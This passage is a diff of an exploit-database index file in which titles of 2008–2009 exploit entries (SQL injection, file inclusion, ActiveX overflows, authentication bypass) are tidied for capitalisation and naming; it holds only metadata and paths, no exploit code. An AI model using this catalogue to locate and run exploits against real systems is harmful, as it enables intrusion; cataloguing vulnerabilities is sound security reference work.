'atucfobj.dll' ActiveX Remote Buffer Overflow",2008-08-10,"Guido Landi",windows,remote,0 6221,platforms/php/webapps/6221.txt,"Vacation Rental Script 3.0 - 'id' SQL Injection",2008-08-10,CraCkEr,php,webapps,0 6223,platforms/php/webapps/6223.php,"Quicksilver Forums 1.4.1 - forums[] SQL Injection",2008-08-10,irk4z,php,webapps,0 6224,platforms/php/webapps/6224.txt,"txtSQL 2.2 Final - (startup.php) Remote File Inclusion",2008-08-10,CraCkEr,php,webapps,0 @@ -5846,7 +5846,7 @@ id,file,description,date,author,platform,type,port 6228,platforms/php/webapps/6228.txt,"OpenImpro 1.1 - (image.php id) SQL Injection",2008-08-10,nuclear,php,webapps,0 6229,platforms/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (1)",2008-08-11,"Simon Ryeo",multiple,remote,0 6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 - (bannerclick.php adid) SQL Injection",2008-08-11,"Hussin X",php,webapps,0 -6231,platforms/php/webapps/6231.txt,"Ppim 1.0 - (upload/change Password) Multiple Vulnerabilities",2008-08-11,Stack,php,webapps,0 +6231,platforms/php/webapps/6231.txt,"pPIM 1.0 - (upload/change Password) Multiple Vulnerabilities",2008-08-11,Stack,php,webapps,0 6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 - (item) SQL Injection",2008-08-11,"Khashayar Fereidani",php,webapps,0 6233,platforms/php/webapps/6233.txt,"BBlog 0.7.6 - (mod) SQL Injection",2008-08-12,IP-Sh0k,php,webapps,0 6234,platforms/php/webapps/6234.txt,"Joomla! 1.5.x - (Token) Remote Admin Change Password",2008-08-12,d3m0n,php,webapps,0 @@ -5903,7 +5903,7 @@ id,file,description,date,author,platform,type,port 6305,platforms/hardware/remote/6305.htm,"Belkin Wireless G router + ADSL2 modem - Authentication Bypass",2008-08-25,noensr,hardware,remote,0 6306,platforms/php/webapps/6306.pl,"GeekLog 1.5.0 - Arbitrary File Upload",2008-08-25,t0pP8uZz,php,webapps,0 6307,platforms/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - (department) SQL Injection",2008-08-25,"GulfTech Security",php,webapps,0 -6309,platforms/php/webapps/6309.txt,"z-breaknews 2.0 - (single.php) SQL Injection",2008-08-26,cOndemned,php,webapps,0 +6309,platforms/php/webapps/6309.txt,"z-breaknews 2.0 - 'single.php' SQL Injection",2008-08-26,cOndemned,php,webapps,0 6310,platforms/php/webapps/6310.txt,"Kolifa.net Download Script 1.2 - 'id' SQL Injection",2008-08-26,Kacak,php,webapps,0 6311,platforms/php/webapps/6311.php,"Simple PHP Blog (SPHPBlog) 0.5.1 - Code Execution",2008-08-26,mAXzA,php,webapps,0 6312,platforms/php/webapps/6312.txt,"k-rate - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-26,Corwin,php,webapps,0 @@ -5912,7 +5912,7 @@ id,file,description,date,author,platform,type,port 6315,platforms/php/webapps/6315.txt,"iFdate 2.0.3 - SQL Injection",2008-08-26,~!Dok_tOR!~,php,webapps,0 6316,platforms/php/webapps/6316.php,"MyBulletinBoard (MyBB) 1.2.11 - private.php SQL Injection (2)",2008-08-26,c411k,php,webapps,0 6317,platforms/windows/remote/6317.html,"Microsoft Visual Studio - 'Msmask32.ocx' ActiveX Remote Buffer Overflow",2008-08-26,Koshi,windows,remote,0 -6318,platforms/windows/remote/6318.html,"Ultra Office - ActiveX Control Remote Buffer Overflow",2008-08-27,shinnai,windows,remote,0 +6318,platforms/windows/remote/6318.html,"Ultra Shareware Office Control - ActiveX Control Remote Buffer Overflow",2008-08-27,shinnai,windows,remote,0 6319,platforms/windows/dos/6319.html,"Ultra Office - ActiveX Control Arbitrary File Corruption Exploit",2008-08-27,shinnai,windows,dos,0 6320,platforms/php/webapps/6320.txt,"phpMyRealty 1.0.9 - Multiple SQL Injections",2008-08-27,~!Dok_tOR!~,php,webapps,0 6321,platforms/php/webapps/6321.txt,"Yourownbux 3.1 / 3.2 Beta - SQL Injection",2008-08-27,~!Dok_tOR!~,php,webapps,0 @@ -5924,7 +5924,7 @@ id,file,description,date,author,platform,type,port 6327,platforms/windows/dos/6327.html,"Najdi.si Toolbar - ActiveX Remote Buffer Overflow (PoC)",2008-08-29,shinnai,windows,dos,0 6328,platforms/solaris/remote/6328.c,"Sun Solaris 10 - snoop(1M) Utility Remote Exploit",2008-08-29,Andi,solaris,remote,0 6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow",2008-08-29,Koshi,windows,local,0 -6330,platforms/windows/dos/6330.txt,"Micrsoft Windows GDI - (CreateDIBPatternBrushPt) Heap Overflow (PoC)",2008-08-29,Ac!dDrop,windows,dos,0 +6330,platforms/windows/dos/6330.txt,"Microsoft Windows - GDI (CreateDIBPatternBrushPt) Heap Overflow (PoC)",2008-08-29,Ac!dDrop,windows,dos,0 6332,platforms/php/webapps/6332.txt,"brim 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-30,InjEctOr5,php,webapps,0 6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - '.bcproj' Local Buffer Overflow",2008-08-30,Koshi,windows,local,0 6334,platforms/windows/remote/6334.html,"Friendly Technologies - Read/Write Registry/Read Files Exploit",2008-08-30,spdr,windows,remote,0 @@ -6006,8 +6006,8 @@ id,file,description,date,author,platform,type,port 6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,php,webapps,0 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0 6421,platforms/php/webapps/6421.php,"WordPress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0 -6422,platforms/php/webapps/6422.txt,"phpvid 1.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-09-10,r45c4l,php,webapps,0 -6423,platforms/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free - (page) SQL Injection",2008-09-10,Cru3l.b0y,php,webapps,0 +6422,platforms/php/webapps/6422.txt,"phpVID 1.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-09-10,r45c4l,php,webapps,0 +6423,platforms/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free - 'page' SQL Injection",2008-09-10,Cru3l.b0y,php,webapps,0 6424,platforms/windows/dos/6424.html,"Adobe Acrobat 9 - ActiveX Remote Denial of Service",2008-09-11,"Jeremy Brown",windows,dos,0 6425,platforms/php/webapps/6425.txt,"PhpWebGallery 1.3.4 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2008-09-11,"Khashayar Fereidani",php,webapps,0 6426,platforms/php/webapps/6426.txt,"Autodealers CMS AutOnline - (pageid) SQL Injection",2008-09-11,r45c4l,php,webapps,0 @@ -6036,7 +6036,7 @@ id,file,description,date,author,platform,type,port 6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion / PHPInfo Disclosure Vulnerabilities",2008-09-13,SirGod,php,webapps,0 6452,platforms/php/webapps/6452.txt,"phpsmartcom 0.2 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-09-13,r3dm0v3,php,webapps,0 6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b - (oyun) SQL Injection",2008-09-13,Crackers_Child,asp,webapps,0 -6454,platforms/windows/remote/6454.html,"Microsoft Windows Media Encoder XP SP2 - 'wmex.dll' ActiveX Buffer Overflow (MS08-053)",2008-09-13,haluznik,windows,remote,0 +6454,platforms/windows/remote/6454.html,"Microsoft Windows Media Encoder (Windows XP SP2) - 'wmex.dll' ActiveX Buffer Overflow (MS08-053)",2008-09-13,haluznik,windows,remote,0 6455,platforms/php/webapps/6455.txt,"Linkarity - 'link.php' SQL Injection",2008-09-13,"Egypt Coder",php,webapps,0 6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,php,webapps,0 6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 - Insecure Cookie Handling",2008-09-14,Stack,php,webapps,0 @@ -6053,7 +6053,7 @@ id,file,description,date,author,platform,type,port 6468,platforms/php/webapps/6468.txt,"Attachmax Dolphin 2.1.0 - Multiple Vulnerabilities",2008-09-16,K-159,php,webapps,0 6469,platforms/php/webapps/6469.txt,"Gonafish LinksCaffePRO 4.5 - 'index.php' SQL Injection",2008-09-16,sl4xUz,php,webapps,0 6470,platforms/asp/webapps/6470.txt,"Hotel Reservation System - 'city.asp city' Blind SQL Injection",2008-09-16,JosS,asp,webapps,0 -6471,platforms/multiple/dos/6471.pl,"QuickTime 7.5.5 / iTunes 8.0 - Remote Off-by-One Crash",2008-09-16,securfrog,multiple,dos,0 +6471,platforms/multiple/dos/6471.pl,"Apple QuickTime 7.5.5 / iTunes 8.0 - Remote Off-by-One Crash",2008-09-16,securfrog,multiple,dos,0 6472,platforms/multiple/dos/6472.c,"Postfix < 2.4.9 / 2.5.5 / 2.6-20080902 - '.forward' Local Denial of Service",2008-09-16,"Albert Sellares",multiple,dos,0 6473,platforms/php/webapps/6473.txt,"phpRealty 0.3 - (INC) Remote File Inclusion",2008-09-17,ka0x,php,webapps,0 6474,platforms/windows/dos/6474.rb,"WonderWare SuiteLink 2.0 - Remote Denial of Service (Metasploit)",2008-09-17,"belay tows",windows,dos,0 @@ -6167,7 +6167,7 @@ id,file,description,date,author,platform,type,port 6585,platforms/php/webapps/6585.txt,"openEngine 2.0 beta2 - Remote File Inclusion",2008-09-26,Crackers_Child,php,webapps,0 6586,platforms/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 6587,platforms/php/webapps/6587.txt,"The Gemini Portal - 'lang' Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0 -6588,platforms/windows/dos/6588.txt,"Microsoft Windows GDI+ - '.ico' Remote Division By Zero Exploit",2008-09-26,"laurent gaffié ",windows,dos,0 +6588,platforms/windows/dos/6588.txt,"Microsoft Windows - GDI+ '.ico' Remote Division By Zero Exploit",2008-09-26,"laurent gaffié ",windows,dos,0 6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - (showtopic) SQL Injection",2008-09-26,0x90,php,webapps,0 6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase - 'catid' SQL Injection",2008-09-27,Crackers_Child,php,webapps,0 6591,platforms/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,php,webapps,0 @@ -6233,7 +6233,7 @@ id,file,description,date,author,platform,type,port 6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - (infile) Local File Inclusion",2008-10-02,ZeN,php,webapps,0 6654,platforms/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow (PoC)",2008-10-02,securfrog,windows,dos,0 6655,platforms/php/webapps/6655.php,"OpenX 2.6 - (ac.php bannerid) Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0 -6656,platforms/windows/remote/6656.txt,"Microsoft Windows GDI - (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0 +6656,platforms/windows/remote/6656.txt,"Microsoft Windows - GDI (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0 6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0 6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0 @@ -6252,7 +6252,7 @@ id,file,description,date,author,platform,type,port 6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 - (malformed bmp image) Crash",2008-10-05,suN8Hclf,windows,dos,0 6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public 1.0 - Arbitrary File Upload / Information (c99)",2008-10-05,JosS,php,webapps,0 6675,platforms/php/webapps/6675.pl,"Galerie 3.2 - (pic) WBB Lite Addon Blind SQL Injection",2008-10-05,J0hn.X3r,php,webapps,0 -6676,platforms/php/webapps/6676.txt,"opennms < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0 +6676,platforms/php/webapps/6676.txt,"OpenNMS < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0 6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - (leggi.php id) SQL Injection",2008-10-05,Piker,php,webapps,0 6678,platforms/php/webapps/6678.txt,"Fastpublish CMS 1.9999 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-10-05,~!Dok_tOR!~,php,webapps,0 6679,platforms/php/webapps/6679.txt,"phpAbook 0.8.8b - 'cookie' Local File Inclusion",2008-10-05,JosS,php,webapps,0 @@ -6266,7 +6266,7 @@ id,file,description,date,author,platform,type,port 6687,platforms/php/webapps/6687.pl,"Yerba SACphp 6.3 - (mod) Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 - (font color) Remote Crash",2008-10-06,"Jeremy Brown",linux,dos,0 6690,platforms/windows/remote/6690.html,"Skype extension for Firefox Beta 2.2.0.95 - Clipboard Writing",2008-10-07,irk4z,windows,remote,0 -6691,platforms/php/webapps/6691.txt,"yerba sacphp 6.3 - Multiple Vulnerabilities",2008-10-07,StAkeR,php,webapps,0 +6691,platforms/php/webapps/6691.txt,"Yerba SACphp 6.3 - Multiple Vulnerabilities",2008-10-07,StAkeR,php,webapps,0 6692,platforms/php/webapps/6692.txt,"Joomla! Component com_hotspots - (w) SQL Injection",2008-10-07,cOndemned,php,webapps,0 6693,platforms/php/webapps/6693.txt,"Yourownbux 4.0 - 'cookie' SQL Injection",2008-10-07,Tec-n0x,php,webapps,0 6694,platforms/php/webapps/6694.txt,"PHP Realtor 1.5 - (view_cat.php v_cat) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 @@ -6291,7 +6291,7 @@ id,file,description,date,author,platform,type,port 6713,platforms/php/webapps/6713.txt,"Scriptsez Mini Hosting Panel - 'members.php' Local File Inclusion",2008-10-09,JosS,php,webapps,0 6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 - (SQL Injection) User Credentials Disclosure",2008-10-09,gnix,php,webapps,0 6715,platforms/php/webapps/6715.txt,"Scriptsez Easy Image Downloader - Local File Download",2008-10-09,JosS,php,webapps,0 -6716,platforms/windows/dos/6716.pl,"Microsoft Windows GDI+ - PoC (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0 +6716,platforms/windows/dos/6716.pl,"Microsoft Windows - GDI+ PoC (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0 6717,platforms/windows/dos/6717.py,"WinFTP Server 2.3.0 - (PASV mode) Remote Denial of Service",2008-10-09,dmnt,windows,dos,0 6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 - (load) Remote Crash",2008-10-10,"Jeremy Brown",linux,dos,0 6719,platforms/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - (POP3) Unauthenticated Denial of Service",2008-10-10,rAWjAW,windows,dos,0 @@ -6354,7 +6354,7 @@ id,file,description,date,author,platform,type,port 6777,platforms/php/webapps/6777.txt,"WordPress Plugin st_newsletter - 'stnl_iframe.php' SQL Injection",2008-10-17,r45c4l,php,webapps,0 6778,platforms/php/webapps/6778.pl,"XOOPS Module GesGaleri - (kategorino) SQL Injection",2008-10-18,EcHoLL,php,webapps,0 6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 - Insecure Cookie Handling",2008-10-18,Qabandi,php,webapps,0 -6780,platforms/php/webapps/6780.txt,"zeeproperty - (adid) SQL Injection",2008-10-18,"Hussin X",php,webapps,0 +6780,platforms/php/webapps/6780.txt,"zeeproperty - 'adid' SQL Injection",2008-10-18,"Hussin X",php,webapps,0 6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection",2008-10-18,Xianur0,php,webapps,0 6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - (del.php) Blind SQL Injection",2008-10-18,StAkeR,php,webapps,0 6783,platforms/php/webapps/6783.php,"Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload",2008-10-18,EgiX,php,webapps,0 @@ -6403,7 +6403,7 @@ id,file,description,date,author,platform,type,port 6828,platforms/windows/remote/6828.html,"db Software Laboratory VImpX - 'VImpX.ocx' Multiple Vulnerabilities",2008-10-24,shinnai,windows,remote,0 6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - 'EditUrl.php url' SQL Injection",2008-10-24,yassine_enp,php,webapps,0 6830,platforms/php/webapps/6830.txt,"NEPT Image Uploader 1.0 - Arbitrary File Upload",2008-10-24,Dentrasi,php,webapps,0 -6831,platforms/windows/local/6831.cpp,"TUGzip 3.00 archiver - '.zip' Local Buffer Overflow",2008-10-24,"fl0 fl0w",windows,local,0 +6831,platforms/windows/local/6831.cpp,"TugZip 3.00 Archiver - '.zip' Local Buffer Overflow",2008-10-24,"fl0 fl0w",windows,local,0 6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,windows,dos,0 6833,platforms/php/webapps/6833.txt,"phpdaily - (SQL Injection / Cross-Site Scripting / lfd) Multiple Vulnerabilities",2008-10-24,0xFFFFFF,php,webapps,0 6834,platforms/windows/dos/6834.c,"vicFTP 5.0 - 'LIST' Remote Denial of Service",2008-10-24,"Alfons Luja",windows,dos,0 @@ -6498,9 +6498,9 @@ id,file,description,date,author,platform,type,port 6924,platforms/php/webapps/6924.txt,"SFS EZ Gaming Cheats - 'id' SQL Injection",2008-11-01,ZoRLu,php,webapps,0 6925,platforms/php/webapps/6925.txt,"Bloggie Lite 0.0.2 Beta - SQL Injection by Insecure Cookie Handling",2008-11-01,JosS,php,webapps,0 6926,platforms/windows/dos/6926.pl,"FTP Now 2.6 Server - Response Remote Crash (PoC)",2008-11-01,DeltahackingTEAM,windows,dos,0 -6927,platforms/php/webapps/6927.txt,"AJ ARTICLE - 'featured_article.php mode' SQL Injection",2008-11-01,Mr.SQL,php,webapps,0 +6927,platforms/php/webapps/6927.txt,"AJ Article - 'featured_article.php mode' SQL Injection",2008-11-01,Mr.SQL,php,webapps,0 6928,platforms/php/webapps/6928.txt,"Joomla! Component Flash Tree Gallery 1.0 - Remote File Inclusion",2008-11-01,NoGe,php,webapps,0 -6929,platforms/php/webapps/6929.txt,"Article Publisher PRO 1.5 - Insecure Cookie Handling",2008-11-01,ZoRLu,php,webapps,0 +6929,platforms/php/webapps/6929.txt,"Graugon PHP Article Publisher Pro 1.5 - Insecure Cookie Handling",2008-11-01,ZoRLu,php,webapps,0 6930,platforms/php/webapps/6930.txt,"GO4I.NET ASP Forum 1.0 - (forum.asp iFor) SQL Injection",2008-11-01,Bl@ckbe@rD,php,webapps,0 6931,platforms/php/webapps/6931.txt,"YourFreeWorld Programs Rating - 'details.php id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6932,platforms/php/webapps/6932.txt,"AJ ARTICLE - (Authentication Bypass) SQL Injection",2008-11-01,Hakxer,php,webapps,0 @@ -6516,7 +6516,7 @@ id,file,description,date,author,platform,type,port 6942,platforms/php/webapps/6942.txt,"YourFreeWorld Scrolling Text Ads - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6943,platforms/php/webapps/6943.txt,"YourFreeWorld Reminder Service - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6944,platforms/php/webapps/6944.txt,"YourFreeWorld Classifieds Blaster - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6945,platforms/php/webapps/6945.txt,"YourFreeWorld Classifieds - (category) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6945,platforms/php/webapps/6945.txt,"YourFreeWorld Classifieds - 'category' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6946,platforms/php/webapps/6946.txt,"Downline Goldmine Builder - 'tr.php id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6947,platforms/php/webapps/6947.txt,"Downline Goldmine Category Addon - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6948,platforms/php/webapps/6948.txt,"YourFreeWorld Classifieds Hosting - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 @@ -6756,7 +6756,7 @@ id,file,description,date,author,platform,type,port 7198,platforms/php/webapps/7198.txt,"Netartmedia Cars Portal 2.0 - (image.php id) SQL Injection",2008-11-23,snakespc,php,webapps,0 7199,platforms/php/webapps/7199.txt,"Netartmedia Blog System - 'image.php id' SQL Injection",2008-11-23,snakespc,php,webapps,0 7200,platforms/php/webapps/7200.txt,"PG Real Estate - (Authentication Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 -7201,platforms/php/webapps/7201.txt,"PG Roomate Finder Solution - (Authentication Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 +7201,platforms/php/webapps/7201.txt,"Pilot Group PG Roommate Finder Solution - (Authentication Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 7202,platforms/php/webapps/7202.txt,"PG Job Site - (poll_view_id) Blind SQL Injection",2008-11-23,ZoRLu,php,webapps,0 7204,platforms/php/webapps/7204.txt,"MODx CMS 0.9.6.2 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0 7205,platforms/php/webapps/7205.txt,"Goople CMS 1.7 - Insecure Cookie Handling",2008-11-23,BeyazKurt,php,webapps,0 @@ -6848,7 +6848,7 @@ id,file,description,date,author,platform,type,port 7293,platforms/asp/webapps/7293.txt,"Active Web Helpdesk 2 - (Authentication Bypass) SQL Injection",2008-11-29,Cyber-Zone,asp,webapps,0 7294,platforms/php/webapps/7294.pl,"Lito Lite CMS - 'cate.php cid' SQL Injection",2008-11-29,"CWH Underground",php,webapps,0 7295,platforms/asp/webapps/7295.txt,"Active Test 2.1 - 'QuizID' Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7296,platforms/windows/dos/7296.txt,"iTunes 8.0.2.20/QuickTime 7.5.5 - (.mov) Multiple Off By Overflow (PoC)",2008-11-30,"laurent gaffié ",windows,dos,0 +7296,platforms/windows/dos/7296.txt,"Apple iTunes 8.0.2.20/QuickTime 7.5.5 - (.mov) Multiple Off By Overflow (PoC)",2008-11-30,"laurent gaffié ",windows,dos,0 7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow (PoC)",2008-11-30,"Encrypt3d.M!nd ",windows,dos,0 7298,platforms/php/webapps/7298.txt,"Active Web Helpdesk 2 - 'categoryId' Blind SQL Injection",2008-11-30,Cyber-Zone,php,webapps,0 7299,platforms/php/webapps/7299.txt,"Active Photo Gallery 6.2 - (Authentication Bypass) SQL Injection",2008-11-30,R3d-D3V!L,php,webapps,0 @@ -6905,7 +6905,7 @@ id,file,description,date,author,platform,type,port 7353,platforms/asp/webapps/7353.txt,"Cold BBS - 'cforum.mdb' Remote Database Disclosure",2008-12-05,ahmadbady,asp,webapps,0 7354,platforms/php/webapps/7354.txt,"Tizag Countdown Creator .v.3 - Insecure Upload",2008-12-05,ahmadbady,php,webapps,0 7355,platforms/windows/remote/7355.txt,"NULL FTP Server 1.1.0.7 - Site Parameters Command Injection",2008-12-05,"Tan Chew Keong",windows,remote,0 -7356,platforms/asp/webapps/7356.txt,"asp AutoDealer - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,asp,webapps,0 +7356,platforms/asp/webapps/7356.txt,"ASP AutoDealer - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,asp,webapps,0 7357,platforms/asp/webapps/7357.txt,"ASP PORTAL - Multiple SQL Injections",2008-12-05,AlpHaNiX,asp,webapps,0 7358,platforms/windows/dos/7358.html,"Visagesoft eXPert PDF EditorX - 'VSPDFEditorX.ocx' Insecure Method",2008-12-05,"Marco Torti",windows,dos,0 7359,platforms/asp/webapps/7359.txt,"ASPTicker 1.0 - (news.mdb) Remote Database Disclosure",2008-12-05,ZoRLu,asp,webapps,0 @@ -6939,9 +6939,9 @@ id,file,description,date,author,platform,type,port 7387,platforms/windows/dos/7387.py,"Neostrada Livebox Router - Remote Network Down (PoC)",2008-12-08,0in,windows,dos,0 7388,platforms/php/webapps/7388.txt,"webcaf 1.4 - (Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities",2008-12-08,dun,php,webapps,0 7389,platforms/hardware/remote/7389.htm,"DD-WRT v24-sp1 - Cross-Site Reference Forgery",2008-12-08,"Michael Brooks",hardware,remote,0 -7390,platforms/asp/webapps/7390.txt,"Professional Download Assistant 0.1 - (Authentication Bypass) SQL Injection",2008-12-09,ZoRLu,asp,webapps,0 +7390,platforms/asp/webapps/7390.txt,"dotnetindex Professional Download Assistant 0.1 - (Authentication Bypass) SQL Injection",2008-12-09,ZoRLu,asp,webapps,0 7391,platforms/asp/webapps/7391.txt,"Poll Pro 2.0 - (Authentication Bypass) SQL Injection",2008-12-09,AlpHaNiX,asp,webapps,0 -7392,platforms/php/webapps/7392.txt,"phpmygallery 1.0beta2 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities",2008-12-09,ZoRLu,php,webapps,0 +7392,platforms/php/webapps/7392.txt,"PHPmyGallery 1.0beta2 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities",2008-12-09,ZoRLu,php,webapps,0 7393,platforms/linux/local/7393.txt,"PHP - Safe_mode Bypass via proc_open() and custom Environment",2008-12-09,gat3way,linux,local,0 7395,platforms/php/webapps/7395.txt,"Peel Shopping 3.1 - (index.php rubid) SQL Injection",2008-12-09,SuB-ZeRo,php,webapps,0 7396,platforms/php/webapps/7396.txt,"Netref 4.0 - Multiple SQL Injections",2008-12-09,SuB-ZeRo,php,webapps,0 @@ -7217,7 +7217,7 @@ id,file,description,date,author,platform,type,port 7670,platforms/php/webapps/7670.pl,"Joomla! Component com_phocadocumentation - 'id' SQL Injection",2009-01-05,EcHoLL,php,webapps,0 7671,platforms/windows/local/7671.pl,"VUPlayer 2.49 - '.wax' Local Buffer Overflow",2009-01-05,Houssamix,windows,local,0 7672,platforms/php/webapps/7672.txt,"phpauctionsystem - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-05,x0r,php,webapps,0 -7673,platforms/multiple/dos/7673.html,"Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0 +7673,platforms/multiple/dos/7673.html,"Apple Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0 7674,platforms/php/webapps/7674.txt,"PHPAuctionSystem - Insecure Cookie Handling",2009-01-05,ZoRLu,php,webapps,0 7675,platforms/multiple/local/7675.txt,"Oracle 10g - SYS.LT.REMOVEWORKSPACE SQL Injection",2009-01-06,sh2kerr,multiple,local,0 7676,platforms/multiple/local/7676.txt,"Oracle 10g - SYS.LT.MERGEWORKSPACE SQL Injection",2009-01-06,sh2kerr,multiple,local,0 @@ -7499,7 +7499,7 @@ id,file,description,date,author,platform,type,port 7959,platforms/php/webapps/7959.txt,"Simple Machines Forums - (BBCode) Cookie Stealing",2009-02-03,Xianur0,php,webapps,0 7960,platforms/php/webapps/7960.txt,"AJA Modules Rapidshare 1.0.0 - Arbitrary File Upload",2009-02-03,"Hussin X",php,webapps,0 7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b - (photo.php id) Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0 -7962,platforms/windows/dos/7962.pl,"Hex Workshop 6.0 - (ColorMap files .cmap) Invalid Memory Reference (PoC)",2009-02-03,DATA_SNIPER,windows,dos,0 +7962,platforms/windows/dos/7962.pl,"Hex Workshop 6.0 - '.cmap' Invalid Memory Reference (PoC)",2009-02-03,DATA_SNIPER,windows,dos,0 7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - (Authentication Bypass) SQL Injection",2009-02-03,Kacak,asp,webapps,0 7964,platforms/php/webapps/7964.txt,"4Site CMS 2.6 - Multiple SQL Injections",2009-02-03,D.Mortalov,php,webapps,0 7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0 @@ -7571,7 +7571,7 @@ id,file,description,date,author,platform,type,port 8034,platforms/php/webapps/8034.txt,"Mynews 0_10 - (Authentication Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0 8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release - (Authentication Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0 8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 - File Disclosure / SQL Injection / Command Execution",2009-02-10,Osirys,php,webapps,0 -8037,platforms/multiple/remote/8037.txt,"ProFTPd with mod_mysql - Authentication Bypass",2009-02-10,gat3way,multiple,remote,0 +8037,platforms/multiple/remote/8037.txt,"ProFTPd - 'mod_mysql' Authentication Bypass",2009-02-10,gat3way,multiple,remote,0 8038,platforms/php/webapps/8038.py,"TYPO3 < 